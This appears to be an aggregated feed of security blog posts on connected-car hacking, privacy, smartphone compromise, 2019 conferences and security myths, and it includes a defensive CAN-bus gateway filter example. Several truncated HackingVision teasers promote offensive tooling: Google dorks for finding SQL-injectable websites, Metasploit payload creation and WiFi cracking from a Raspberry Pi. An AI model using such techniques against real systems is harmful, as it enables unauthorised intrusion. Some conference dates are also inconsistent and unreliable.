What is the reason for that, you may be wondering, since they were created to simplify traffic movement in the first place?

The autonomous cars could be programmed to aimlessly drive on the streets, without parking, in order to avoid payments. Basically, the price for recharging an electric autonomous car would be much lower than the overall parking fee.

The concerns around data collection and privacy

The same Deloitte 2019 report shows most people are worried about biometric data being collected by self-driving car manufacturers through their connected vehicles and sent to other parties.

Source: Deloitte

In truth, data does need to be collected in order to improve functionalities, but this could also cause the invasion of your privacy.

So the question is where that data ends up and how it’s actually used. Some may argue that it could be shared with the government or used for marketing purposes.

Thus, authorities need to put strict rules and regulations in place.

Solving the cybersecurity question

Without a doubt, autonomous vehicles need state-of-the-art cybersecurity.

According to a recent study which surveyed auto engineers and IT experts, 84% of respondents were concerned that car manufacturers are not keeping pace with the industry’s constantly increasing cybersecurity threats.

Since self-driving cars have been involved in numerous accidents, they clearly still have flaws, which can be exploited by malicious actors. Although aspects such as proper navigation systems and collision avoidance are obvious priorities for manufacturers, cybersecurity should also be top of mind.

According to Skanda Vivek, a postdoctoral researcher at the Georgia Institute of Technology, if people were to hack even a small number of internet-connected self-driving cars on the roads of the United States, the flow of traffic would be completely frozen. And emergency vehicles would not even be able to pass through.


Source: Skanda Vivek/ Georgia Tech

“Compromised vehicles are unlike compromised data,” argues Vivek in the study’s press release. “Collisions caused by compromised vehicles present physical danger to the vehicle’s occupants, and these disturbances would potentially have broad implications for overall traffic flow.”

Around four years ago, researchers Charlie Miller and Chris Valasek remotely hacked a Jeep Cherokee as an experiment. They used a laptop to do it while being at a 10-mile distance and managed to take full control of the vehicle.

Watch below what happened:

This was not even a self-driving vehicle, but the same scenario can be applied to one. In fact, this can even be more plausible in the case of autonomous cars due to their increased internet connectivity.

Right now, you won’t find two identical automation systems in the industry. Yet, according to the University of Michigan’s report, as systems become more generic, or even use open-source software, one attack could spread across every car deploying the same system. This is just what happened with the WannaCry ransomware attack, which infected more than 300,000 computers in 150 countries, at an estimated cost of $4 billion.

But are things really that bad?

On a more positive note, there are cybersecurity experts who believe that in the future, fully autonomous cars will be much harder to hack than we might think. This “fully autonomous” technology (remember Level 5, which we were talking about above?) will rely on multiple sensors and communication layers.

At the moment, self-driving cars are only using one or two sensors for object detection, according to Craig Smith, research director of cyber analytics group Rapid7.

In his view, since it’s already quite difficult to hack a single sensor, a malicious criminal will find it even harder to override a complex sensor system.

“If we’re having a discussion about what’s safe, it’s more likely that you’ll get into a car accident today than someone will hack into your car tomorrow”, Smith pointed out.

How can we stop self-driving cars from being hacked?

The good news is that experts are constantly working on developing better security systems.

For instance, just a few weeks ago, SK Telecom announced the launch of a solution based on Quantum Encryption.


How does it work?

As per SK Telecom, this is an “integrated security device that will be installed inside cars and protect various electronic units and networks in the vehicle”.

Also, the gateway, which was developed together with the controller maker GINT, will be used to secure all the vehicle systems: Vehicle-2-Everything (V2X) and Bluetooth communication systems, the car’s driver assistance, radar, and smart keys. Drivers will also be alerted to any suspicious behavior.

The gateway basically transfers a quantum random number generator and Quantum Key along with the vehicle’s data that will “fundamentally prevent hacking and make the cars unhackable”, according to SK Telecom. The company also added that this move was to facilitate security in the 5G era.

This is not the first initiative of this kind. In another project, the cyber-security group at Coventry University’s Institute for Future Transport and Cities (FTC) teamed up with the quantum experts at cybersecurity start-up Crypta Labs and they also reportedly worked on this quantum technology that can prevent hacking.

Here’s a bonus

We stumbled upon a great video that we’d like to share with you, in which Victor Schwartz, a partner at Shook, Hardy & Bacon, talks about the potential risks of driverless cars – privacy issues and cybersecurity.

You can watch the full video here:

Conclusion

At the moment, concerns around self-driving technology clearly outweigh the benefits. It’s now crucial for manufacturers to focus on the cybersecurity problems of autonomous cars, employing dedicated staff to work on these issues. However, with proper security measures in place, hacking risks can, in time, be dramatically reduced.

Would you trust a self-driving car? What’s your opinion on the overall security of autonomous vehicles? We would love to hear your thoughts in the comments section below.

The post Are Hackers Threatening the Adoption of Self-Driving Cars? appeared first on Heimdal Security Blog.

Scan WordPress websites for vulnerabilities WPScan Kali Linux

Scan WordPress websites for vulnerabilities WPScan Kali Linux   WPScan is a black box vulnerability scanner for WordPress websites. WPScan comes pre-installed in Kali Linux. Kali Linux is a popular Linux distribution built on Debian Kali Linux comes with many of the best ethical hacking tools pre-installed. If you’re not using Kali Linux and you […]

The post Scan WordPress websites for vulnerabilities WPScan Kali Linux appeared first on HackingVision.

DMitry Deepmagic information Gathering Tool Kali Linux

DMitry Deepmagic information Gathering Tool Kali Linux   DMitry (Deepmagic Information Gathering Tool) is an open source Linux CLI tool developed by James Greig, coded in C. DMitry is a powerful information gathering tool that aims to gather as much information about a host as possible. Features include subdomains search, email addresses, uptime information, […]

The post DMitry Deepmagic information Gathering Tool Kali Linux appeared first on HackingVision.

Facebook stored hundreds of millions of passwords unprotected

Company admits to mistake and says it has no evidence of abuse – but the risk was huge

Facebook mistakenly stored “hundreds of millions” of passwords in plaintext, unprotected by any encryption, the company has admitted.

The mistake, which led to user passwords being kept in Facebook’s internal servers in an insecure way, affects “hundreds of millions of Facebook Lite users, tens of millions of other Facebook users, and tens of thousands of Instagram users”, according to the social networking site. Facebook Lite is a version of Facebook created for use in nations where mobile data is unaffordable or unavailable.

Related: Facebook's security is so bad it's surprising Zuckerberg hasn't deleted his account

Continue reading...

Kali Linux Micro Hacking Station Raspberry Pi

Kali Linux Micro Hacking Station Raspberry Pi   Raspberry Pi is a small pocket sized low cost computer. Today we will be setting up Kali Linux on Raspberry Pi. We can use Kali Linux on Raspberry Pi to hack WiFi passwords, launch various social engineering attacks, Set up rogue access points and a wide range […]

The post Kali Linux Micro Hacking Station Raspberry Pi appeared first on HackingVision.

Create Metasploit Payload in Kali Linux MSFvenom Payload Creator

Create Metasploit Payload in Kali Linux MSFvenom Payload Creator (MSFPC)   Disclaimer Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors of Hackingvision.com will not be […]

The post Create Metasploit Payload in Kali Linux MSFvenom Payload Creator appeared first on HackingVision.

This Is How Easy It Is To Get Hacked – Vice News – HackingVision

This Is How Easy It Is To Get Hacked Vice News talks about how easy it is to get hacked. VICE News went to Moscow to see the country’s expert hackers in action. “If someone wants to hack you, they’re gonna be able to” former NSA hacker Patrick Wardle told VICE News. And if a […]

The post This Is How Easy It Is To Get Hacked – Vice News – HackingVision appeared first on HackingVision.

Google Dorks List 2019 SQLi Dorks – HackingVision

Google Dorks List 2019 SQLi Dorks Google Dorks List 2019, Google Dorks List, Find SQL Injectable Websites, Hack Websites using Google Dorks, Google Dorks List SQL Injection. Google Dorks List 2019 is a list of dorks to find SQL injectable websites. A Google dork query, sometimes just referred to as a dork, is a search […]

The post Google Dorks List 2019 SQLi Dorks – HackingVision appeared first on HackingVision.

25 Free eBooks to learn Python 2019 – HackingVision

Free eBooks list of free Python programming eBooks to learn Python programming. Download eBooks in PDF EPUB 2019 Python eBooks. List curated by Hackingvision.com Disclaimer: The contributor(s) cannot be held responsible for any misuse of the data. This repository is just a collection of URLs to download eBooks for free. Download the eBooks at your […]

The post 25 Free eBooks to learn Python 2019 – HackingVision appeared first on HackingVision.

DorkMe – Google Dorks Tool Search For Vulnrabilities

DorkMe – Google Dorks Tool Google Dorks Tool DorkMe is a tool designed with the purpose of making easier the searching of vulnerabilities with Google Dorks, such as SQL Injection vulnerabilities. Dependencies   pip install -r requirements.txt It is highly recommended to add more dorks for an effective search, keep reading to see how Usage […]

The post DorkMe – Google Dorks Tool Search For Vulnrabilities appeared first on HackingVision.

Automotive Technologies and Cyber Security

A guest article authored by Giles Kirkland
Giles is a car expert and dedicated automotive writer with a great passion for electric vehicles, autonomous cars and other innovative technologies. He loves researching the future of motorisation and sharing his ideas with auto enthusiasts across the globe. You can find him on Twitter, Facebook and at Oponeo.

Surveys show that about 50% of the UK feel that driverless vehicles will make their lives much easier and are eagerly anticipating the arrival of this exciting technology. Cities expect that when driverless car technology is fully implemented, the gridlock which now plagues their streets will be relieved to a large extent. Auto-makers predict that the new technology will encourage a surge in vehicle purchases, and technology companies are lining up with the major auto manufacturers to lend their experience and knowledge to the process, hoping to earn huge profits.

Delays to Driverless Technology
While some features of autonomous technology have already been developed and have been rolled out in various new vehicles, the full technology will probably not be mature for several decades yet. One of the chief holdups is in establishing the infrastructure necessary on the roads themselves and in cities, in order to safely enable driverless operation.

The full weight of modern technology is pushing development along at a breakneck pace. Unlike safety testing of the past, where a handful of real-life scenarios were simulated to anticipate vehicle reactions, high-powered simulators have now been set up to increase the rate at which vehicle software can 'learn' what to do in those real-life situations. This enables learning at a rate far greater than any vehicle of the past, which is not surprising, since vehicles of the past were not equipped with the 'brains' that autonomous cars will have.

The Cyber Security aspect of Autonomous Vehicles
Despite the enormous gains that will come from autonomous vehicles, both socially and economically, some problems will inevitably arise, and industry experts agree that the biggest of these threats is cyber security. In 2015, a famous incident dramatically illustrated the possibilities. That year, white-hat security researchers took remote control of a Jeep Cherokee by exploiting its Internet-connected Uconnect infotainment system, and from there reached the transmission, brakes and steering. This glaring shortcoming prompted Chrysler to recall more than one million vehicles, and provided the world with an alarming illustration of what could happen if someone with criminal intent breached the security system of a vehicle.

Cars of today have as many as 100 Electronic Control Units (ECUs), running more than 100 million lines of code, and that presents a huge attack surface to the criminal-minded person. An attacker who compromises a peripheral ECU, for instance the vehicle's Bluetooth or infotainment unit, can in principle put messages onto the shared in-vehicle network (typically a CAN bus) and so influence other ECUs responsible for a whole host of safety systems, unless the network is segmented and traffic between segments is filtered. Connected cars of the future will of course have even more ECUs controlling the vehicle's operations, which will provide even more opportunities for cyber attack.


Defense against Cyber Attacks
As scary as the whole cyber situation sounds, with the frightening prospect of complete loss of control of a vehicle, there is reason to think that the threat can be managed effectively. Numerous companies are already researching and developing ways to make cars resistant to attack, using a multi-tiered defence in which several different security controls are installed at different levels of the car's architecture.

Individual systems and ECUs can be hardened against attack. One level up, software protection is being developed to safeguard the vehicle's entire internal network. Above that, there are already solutions in place to defend vehicles at the point where ECUs connect to external sources, typically a gateway between the externally reachable units (telematics, infotainment) and the safety-critical buses. This is perhaps the most critical layer, since it represents the boundary between internal and external communications. The final layer of security comes from the cloud itself: threats can be identified and blocked before they are ever sent to a car.
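The gateway layer described above, as an added example that is not part of the article or any vendor's product: an allow-list filter that decides whether a CAN frame arriving from an externally reachable interface may cross onto the protected bus. The arbitration IDs, the interface names ("telematics", "powertrain") and the policies are assumptions for illustration; real IDs are OEM-specific.

```python
"""Allow-list CAN gateway between an externally reachable ECU and the safety-critical bus.

Added example for this article; it is not code from the article or from any
vendor's product. Frames are modelled as plain Python objects, and every
arbitration ID and policy below is an assumption (real IDs are OEM-specific).
"""
from collections import deque
from dataclasses import dataclass, field

# Assumed 11-bit arbitration IDs for illustration only.
ID_STEERING_CMD = 0x0C1    # hypothetical safety-critical actuator command
ID_INFO_STATUS = 0x3A0     # hypothetical infotainment status broadcast
ID_UDS_FUNCTIONAL = 0x7DF  # UDS functional diagnostic request (real convention)


@dataclass(frozen=True)
class CanFrame:
    arb_id: int   # 11-bit CAN identifier
    data: bytes   # 0..8 byte payload (classic CAN)
    src: str      # interface the frame arrived on, e.g. "telematics"


@dataclass
class Policy:
    allowed_ids: frozenset                         # IDs this source may forward inward
    max_rate: int                                  # frames per second from this source
    exact_dlc: dict = field(default_factory=dict)  # required payload length per ID


class Gateway:
    """Decides, per frame, whether it may cross from its source interface onto the protected bus."""

    def __init__(self, policies):
        self.policies = policies
        self._sent = {src: deque() for src in policies}  # timestamps of forwarded frames

    def decide(self, frame, now):
        """Return ("forward", "ok") or ("drop", reason) for a frame seen at time `now` (seconds)."""
        policy = self.policies.get(frame.src)
        if policy is None:
            return "drop", "unknown source interface"
        if not 0 <= frame.arb_id <= 0x7FF:
            return "drop", "not a valid 11-bit identifier"
        if len(frame.data) > 8:
            return "drop", "payload exceeds classic CAN limit"
        if frame.arb_id not in policy.allowed_ids:
            return "drop", f"id 0x{frame.arb_id:03X} not allowed from {frame.src}"
        want = policy.exact_dlc.get(frame.arb_id)
        if want is not None and len(frame.data) != want:
            return "drop", f"expected {want}-byte payload for 0x{frame.arb_id:03X}"
        sent = self._sent[frame.src]
        while sent and now - sent[0] >= 1.0:  # slide a one-second window
            sent.popleft()
        if len(sent) >= policy.max_rate:
            return "drop", "rate limit exceeded"
        sent.append(now)
        return "forward", "ok"


# Telematics may only emit status broadcasts and well-formed diagnostic requests, slowly.
TELEMATICS = Policy(allowed_ids=frozenset({ID_INFO_STATUS, ID_UDS_FUNCTIONAL}),
                    max_rate=5, exact_dlc={ID_UDS_FUNCTIONAL: 8})
# The powertrain side is trusted for actuator commands and is not rate-limited here.
POWERTRAIN = Policy(allowed_ids=frozenset({ID_STEERING_CMD, ID_INFO_STATUS}), max_rate=1000)


def demo():
    """Run a constructed traffic sample through the gateway and return the decisions in order."""
    gw = Gateway({"telematics": TELEMATICS, "powertrain": POWERTRAIN})
    traffic = [
        (0.00, CanFrame(ID_INFO_STATUS, b"\x01\x00", "telematics")),             # legitimate
        (0.01, CanFrame(ID_STEERING_CMD, b"\x7f\xff\x00\x00", "telematics")),   # pivot attempt
        (0.02, CanFrame(ID_UDS_FUNCTIONAL, b"\x02\x10\x03", "telematics")),     # unpadded UDS
        (0.03, CanFrame(ID_UDS_FUNCTIONAL, b"\x02\x10\x03" + b"\x00" * 5, "telematics")),
        (0.04, CanFrame(ID_STEERING_CMD, b"\x00\x10", "powertrain")),           # trusted side
    ]
    # A burst of status frames from telematics; only the first few fit under 5 per second.
    traffic += [(0.10 + i * 0.01, CanFrame(ID_INFO_STATUS, b"\x00", "telematics"))
                for i in range(6)]
    return [gw.decide(frame, t)[0] for t, frame in traffic]


if __name__ == "__main__":
    for i, action in enumerate(demo()):
        print(i, action)
```

The steering command from the telematics side is dropped purely on its identifier, which is the point of the layer: a compromised infotainment unit should not be able to address actuator ECUs at all. The length check and rate limit catch the two other common abuses, malformed diagnostic requests and bus flooding.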

The Cyber Security Nightmare
If you ask an average person in the UK what the biggest problem associated with driverless cars is, they'd probably cite safety. Industry experts, however, feel that once the technology has been worked out there will probably be fewer highway accidents and that driving safety will actually improve. The nightmare of dealing with the threat that always exists when anything is connected to the Internet, however, will remain a cause for concern.

AI & Your Family: The Wows and Potential Risks

Am I the only one? When I hear or see the word Artificial Intelligence (AI), my mind instantly defaults to images from sci-fi movies I’ve seen like I, Robot, Matrix, and Ex Machina. There’s always been a futuristic element — and self-imposed distance — between AI and myself.

But AI is anything but futuristic or distant. AI is here, and it’s now. And, we’re using it in ways we may not even realize.

AI has been woven throughout our lives for years in various expressions of technology. AI is in our homes, workplaces, and our hands every day via our smartphones.

Just a few everyday examples of AI:

  • Cell phones with built-in smart assistants
  • Toys that listen and respond to children
  • Social networks that determine what content you see
  • Social networking apps with fun filters
  • GPS apps that help you get where you need to go
  • Movie apps that predict what show you’d enjoy next
  • Music apps that curate playlists that echo your taste
  • Video games that deploy bots to play against you
  • Advertisers who follow you online with targeted ads
  • Refrigerators that alert you when food is about to expire
  • Home assistants that carry out voice commands
  • Flights you take that operate via an AI autopilot

The Technology

While AI sounds a little intimidating, it’s not when you break it down. AI is technology that can be programmed to accomplish a specific set of goals without assistance. In short, it’s a computer’s ability to be predictive — to process data, evaluate it, and take action.

AI is being implemented in education, business, manufacturing, retail, transportation, and just about any other sector of industry and culture you can imagine. It’s the smarter, faster, more profitable way to accomplish manual tasks.

And there’s tons of AI-generated good going on. Instagram — the #2 most popular social network — is now using AI technology to detect and combat cyberbullying in both comments and photos.

No doubt, AI is having a significant impact on everyday life and is positioned to transform the future.

Still, there are concerns. The self-driving cars. The robots that malfunction. The potential jobs lost to AI robots.

So, as quickly as this popular new technology is being applied, now is a great time to talk with your family about both the exciting potential of AI and the risks that may come with it.

Talking points for families

Fake videos, images. AI is making it easier for people to face swap within images and videos. A desktop application called FakeApp allows users to seamlessly swap faces and share fake videos and images. This has led to the rise in “deep fake” videos that appear remarkably realistic (many of which go viral). Tip: Talk to your family about the power of AI technology and the responsibility and critical thinking they must exercise as they consume and share online content.

Privacy breaches. Following the Cambridge Analytica/Facebook scandal of 2018 that allegedly used AI technology unethically to collect Facebook user data, we’re reminded of those out to gather our private (and public) information for financial or political gain. Tip: Discuss locking down privacy settings on social networks and encourage your kids to be hyper mindful about the information they share in the public feed. That information includes liking and commenting on other content — all of which AI technology can piece together into a broader digital picture for misuse.

Cybercrime. As outlined in McAfee’s 2019 Threats Prediction Report, AI technology will likely make it easier for hackers to bypass network security measures undetected. This can lead to data breaches, malware attacks, ransomware, and other criminal activity. Additionally, AI-generated phishing emails are scamming people into handing over sensitive data. Tip: Bogus emails can be highly personalized and trick intelligent users into clicking malicious links. Discuss the sophistication of AI-related scams and warn your family to think about every click — even those from friends.

IoT security. With homes becoming “smarter” and equipped with AI-powered IoT products, the opportunity for hackers to get into these devices and steal sensitive data is growing. According to McAfee’s Threat Prediction Report, voice-activated assistants are especially vulnerable as a point of entry for hackers. Also at risk, say security experts, are routers, smartphones, and tablets. Tip: Be sure to keep all devices updated. Secure all of your connected devices and your home internet at its source — the network. Where you can, avoid the router supplied by your ISP (Internet Service Provider), since they are often less secure. And be sure to change the default password and secure your primary network and guest network with strong passwords.

The post AI & Your Family: The Wows and Potential Risks appeared first on McAfee Blogs.

Cyber Security Conferences to Attend in 2019

A list of Cyber and Information Security conferences to consider attending in 2019. Conferences are not only great places to learn about the evolving cyber threat landscape and proven security good practices, but also to network with industry-leading security professionals and like-minded enthusiasts, to share ideas, expand your own knowledge, and even to make good friends.

JANUARY 2019

SANS Cyber Threat Intelligence Summit
Monday 21st & Tuesday 22nd January 2019
Renaissance Arlington Capital View Hotel, VA, USA
https://www.sans.org/event/cyber-threat-intelligence-summit-2018


AppSec California 2019 (OWASP)
Tuesday 22nd & Wednesday 23rd January 2019
Annenberg Community Beach House, Santa Monica, USA
https://2019.appseccalifornia.org/


PCI London
Thursday 24th January 2019
Park Plaza Victoria Hotel, London, UK
https://akjassociates.com/event/pcilondon

The Future of Cyber Security Manchester
Thursday 24th January 2019
Bridgewater Hall, Manchester, UK
https://cybermanchester.events/

BSides Leeds
Friday 25th January 2019
Cloth Hall Court, Leeds, UK

FEBRUARY 2019

Cyber Security for Industrial Control Systems
Thursday 7th & Friday 8th February 2019
Savoy Place, London, UK
https://events.theiet.org/cyber-ics/index.cfm

NOORD InfoSec Dialogue UK
Tuesday 26th & Wednesday 27th February 2019
The Bull-Gerrards Cross, Buckinghamshire, UK

MARCH 2019
BSidesSF
Sunday 3rd and Monday 4th March 2019
City View at Metreon, San Francisco, USA
https://bsidessf.org/

RSA Conference
Monday 4th to Friday 8th March 2019
Moscone Center, San Francisco, USA
https://www.rsaconference.com/events/us19

17th Annual e-Crime & Cybersecurity Congress
Tuesday 5th & Wednesday 6th March 2019
Park Plaza Victoria

Security & Counter Terror Expo
Tuesday 5th & Wednesday 6th March 2019
Olympia, London, UK
https://www.counterterrorexpo.com/

ISF UK Spring Conference
Wednesday 6th & Thursday 7th March 2019
Regent Park, London, UK
https://www.securityforum.org/events/chapter-meetings/uk-spring-conference-london/

Cloud and Cyber Security Expo
Tuesday 12th to Wednesday 13th March 2019
ExCel, London, UK
https://www.cloudsecurityexpo.com/

APRIL 2019

Cyber Security Manchester
Wednesday 3rd & Thursday 4th April 2019
Manchester Central, Manchester, UK
https://cybermanchester.events/

(ISC)2 Secure Summit EMEA
Monday 15th & Tuesday 16th April 2019
World Forum, The Hague, Netherlands
https://web.cvent.com/event/df893e22-97be-4b33-8d9e-63dadf28e58c/summary

BSides Scotland 2019
Tuesday 23rd April 2019
Royal College of Physicians, Edinburgh, UK
https://www.contextis.com/en/events/bsides-scotland-2019


CyberUK 2019
Wednesday 24th & Thursday 25th April 2019
Scottish Event Campus, Glasgow, UK
https://www.ncsc.gov.uk/information/cyberuk-2019

Cyber Security & Cloud Expo Global 2019
Thursday 25th and Friday 26th April 2019
Olympia, London, UK
https://www.cybersecuritycloudexpo.com/global/


JUNE 2019
Infosecurity Europe 2019
Tuesday 4th to Thursday 6th June 2019
Olympia, London, UK
https://www.infosecurityeurope.com/

BSides London
Thursday 6th June 2019
ILEC Conference Centre, London, UK
https://www.securitybsides.org.uk/

Blockchain International Show
Thursday 6th and Friday 7th June 2019
ExCel Exhibition & Conference Centre, London, UK
https://bisshow.com/

Hack in Paris 2019
Sunday 16th to Friday 20th June 2019
Maison de la Chimie, Paris, France
https://hackinparis.com/

Gartner Security and Risk Management Summit
Monday 17th to Thursday 20th June 2019
National Harbor, MD, USA
https://www.gartner.com/en/conferences/na/security-risk-management-us

UK CISO Executive Summit
Wednesday 19th June 2019
Hilton Park Lane, London, UK
https://www.evanta.com/ciso/summits/uk#overview

Cyber Security & Cloud Expo Europe 2019
Thursday 19th and Friday 20th June 2019
RAI, Amsterdam, Netherlands
https://cybersecuritycloudexpo.com/europe/

European Maritime Cyber Risk Management Summit
Tuesday 25th June 2019
Norton Rose Fulbright, London, UK


AUGUST 2019
Black Hat USA
Saturday 3rd to Thursday 8th August 2019
Mandalay Bay, Las Vegas, NV, USA
https://www.blackhat.com/upcoming.html

DEF CON 27
Thursday 8th to Sunday 11th August 2019
Paris, Ballys & Planet Hollywood, Las Vegas, NV, USA
https://www.defcon.org/


SEPTEMBER 2019
44Con
Wednesday 11th to Friday 13th September 2019
ILEC Conference Centre, London, UK
https://44con.com/

2019 PCI SSC North America Community Meeting
Tuesday 17th to Thursday 19th September 2019
Vancouver, BC, Canada
https://www.pcisecuritystandards.org/about_us/events

OCTOBER 2019

Hacker Halted
Thursday 10th & Friday 11th October 2019
Atlanta, Georgia, USA
https://www.hackerhalted.com/

BruCON
Thursday 10th & Friday 11th October 2019
Aula, Gent, Belgium
https://www.brucon.org/2019/

EuroCACS/CSX (ISACA) 2019
Wednesday 16th to Friday 19th October 2019
Palexpo Convention Centre, Geneva, Switzerland
https://conferences.isaca.org/euro-cacs-csx-2019

2019 PCI SSC Europe Community Meeting
Tuesday 22nd to Thursday 24th October 2019
Dublin, Ireland
https://www.pcisecuritystandards.org/about_us/events

6th Annual Industrial Control Cyber Security Europe Conference
Tuesday 29th and Wednesday 30th October 2019
Copthorne Tara, Kensington, London, UK
https://www.cybersenate.com/new-events/2018/11/13/6th-annual-industrial-control-cyber-security-europe-conference

ISF 30th Annual World Congress
Saturday 26th to Tuesday 29th October 2019
Convention Centre Dublin, Dublin, Ireland



NOVEMBER 2019
Cyber Security & Cloud Expo North America 2019
Wednesday 13th and Thursday 14th November 2019
Santa Clara Convention Centre, Silicon Valley, USA
https://www.cybersecuritycloudexpo.com/northamerica/

DevSecCon London 
Thursday 14th & Friday 15th November 2019
CodeNode, London, UK


Cyber Security Summit 2019
Wednesday 20th November 2019
QEII Centre, London, UK
https://cybersecuritysummit.co.uk/

2019 PCI SSC Asia-Pacific Community Meeting
Wednesday 20th and Thursday 21st November 2019
Melbourne, Australia
https://www.pcisecuritystandards.org/about_us/events

DeepSec
Thursday 20th to Saturday 30th November 2019
The Imperial Riding School Vienna, Austria
https://deepsec.net/

Post in the comments about any cyber & information security themed conferences or events you recommend.

How To Tell If Your Smartphone Has Been Hacked

Your home screen is just a matrix of numbers. Your device loses its charge quickly, or restarts suddenly. Or, you notice outgoing calls that you never dialed. Chances are your smartphone has been hacked. The sad truth is that hackers now have a multitude of ways to get into your phone, without ever touching it.

Given that our smartphones have become our new wallets, containing a treasure trove of personal and financial information, a breach can leave you at serious risk.

The intruder could log in to your accounts as you, spam your contacts with phishing attacks, or rack up expensive long-distance charges. They could also access any passwords saved on your phone, potentially opening the door to sensitive financial accounts. That’s why it’s important to be able to recognize when your smartphone has been hacked, especially since some of the signs can be subtle.

Here are some helpful clues:

Performance Differences

Is your device operating slower, are web pages and apps harder to load, or does your battery never seem to keep a charge? What about your data plan? Are you exceeding your normal limits? These are all signs that you have malware running in the background, zapping your phone’s resources.

You may have downloaded a bad app, or clicked on a dangerous link in a text message. And malware, like Bitcoin miners, can strain computing power, sometimes causing the phone to heat up, even when you aren’t using it.

Mystery Apps or Data

If you find apps you haven’t downloaded, or calls, texts, and emails that you didn’t send, a hacker is probably in your system. They may be using your device to send premium rate calls or messages, or to spread malware to your contacts.

Pop-ups or Strange Screen Savers

Malware can also be behind spammy pop-ups, changes to your home screen, or bookmarks to suspicious websites. In fact, if you see any configuration changes you didn’t personally make, this is another big clue that your smartphone has been hacked.

What To Do

If any of these scenarios sound familiar, it’s time to take action. Start by deleting any apps or games you didn’t download, erasing risky messages, and running mobile security software, if you have it. Warn your contacts that your phone has been compromised, and to ignore any suspicious links or messages coming from you.

If the problem still doesn’t go away, consider restoring your phone to its original settings. Search online for instructions for your particular phone and operating system to learn how.

Now, let’s look at how to avoid getting hacked in the first place.

Secure Smartphone Tips

1. Use mobile security software—These days your smartphone is just as data rich as your computer. Make sure to protect your critical information, and your privacy, by using comprehensive mobile security software that not only protects you from online threats, but offers anti-theft and privacy protection.

2. Lock your device & don’t store passwords—Make sure that you are using a passcode or facial ID to lock your device when you’re not using it. This way, if you lose your phone it will be more difficult for a stranger to access your information.

Also, remember not to save password or login information for banking apps and other sensitive accounts. You don’t want a hacker to be able to automatically login as you if they do gain access to your device.

3. Avoid using public Wi-Fi—Free Wi-Fi networks, like those offered in hotels and airports, are often unsecured. This makes it easy for a hacker to potentially see the information you are sending over the network. Also, be wary of using public charging stations, unless you choose a “charging only” cable that cannot access your data.

4. Never leave your device unattended in public—While many threats exist online, you still have to be aware of real-world threats, like someone grabbing your device when you’re not looking. Keep your smartphone on you, or within view, while in public.

If you have a “phone visibility” option, turn it off. This setting allows nearby devices to see your phone and exchange data with it.

5. Stay aware—New mobile threats are emerging all the time. Keep up on the latest scams and warning signs, so you know what to look out for.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Tell If Your Smartphone Has Been Hacked appeared first on McAfee Blogs.

Busting 5 Cybersecurity Myths

It is no secret that many people nowadays do not pay much attention when they surf the web at home or at work. There are new data breaches and exploits on a daily basis, and still failing to take any precautions may result in catastrophic consequences. Even the biggest corporations are paying millions of dollars to improve their cybersecurity and remain safe. However, if you still believe some of the cybersecurity myths, you may put your own computer or even your whole organization at huge risk. We at CyberDB have decided to bust the top 5 cyber security myths and make them clear for you.

Only the IT department is responsible for cybersecurity

It is not wrong to say that the IT department is responsible for implementing new processes and policies to keep cybersecurity in top-notch shape. However, they do not have a magic wand to protect every computer on the network. In reality each employee should be extremely careful when receiving and opening e-mail messages from colleagues or third parties, since a single infection can spread across all of the departments within the organization and lead, for example, to a data breach.

Using just an antivirus software is enough

Antivirus software might have been enough to save your business from attack 20 years ago; nowadays it is definitely not enough to protect your whole organization. Attackers find new ways to disable or evade your antivirus and hide their activity in the system. With ransomware gaining popularity among criminals, the time between getting infected and having your information locked can be a matter of seconds. So antivirus alone is not enough; you also need to stay informed about the latest threats. Check out our database of cyber security vendors to find the best solution for your personal or business needs.

A strong password is enough

It is no secret that having a long and complex password on your accounts is essential. However, even big tech giants like Facebook or Apple experience data breaches and are frequent targets for hackers, so a password alone can leak through no fault of your own. Most websites require you to create a strong password, but it is also good to enable two-factor authentication (2FA). Originally the user received the 2FA code by SMS, but even this can be compromised through SIM swapping or a cloned SIM card. So make sure you use an authenticator app such as Google Authenticator, which generates time-based one-time codes on the device itself, to make your accounts more secure.

Threats are being spread only through the Internet

Some users may think that disconnecting from the internet will prevent threats spreading around the network; they are completely wrong. Just imagine what happens if an employee brings an infected flash drive and plugs it in: all of the computers may become infected and your company may lose valuable information. You may have your information stolen even when you shop at a local retailer. So threats are not only online but in our daily lives, and we need to be very careful to take care of our personal information.

Only certain industries experience cyber attacks

Some businesses still believe that they will not be targeted by hackers because they are a small or mid-sized business or in a specific industry. They are completely wrong. Some companies also believe they do not have anything that hackers would find valuable to steal. In reality there is information like personal addresses or credit card numbers that makes every business in every industry a potential target. Here are the industries which are most vulnerable to cyber-attacks nowadays:

Top 10 Sectors Breached

The post Busting 5 Cybersecurity Myths appeared first on CyberDB.

The Myth of “Staying One Step Ahead of the Hackers”

 

The assumption that software security can stay ahead of the hackers is not true because the software security industry is always reacting to threats that hackers expose. Once hackers start exploiting a flaw in an application, security companies try to block the resulting threat by providing security updates for existing software or by developing new programs. Either way, hackers will be one step ahead because the software security industry can’t predict what new threats the hackers will unleash.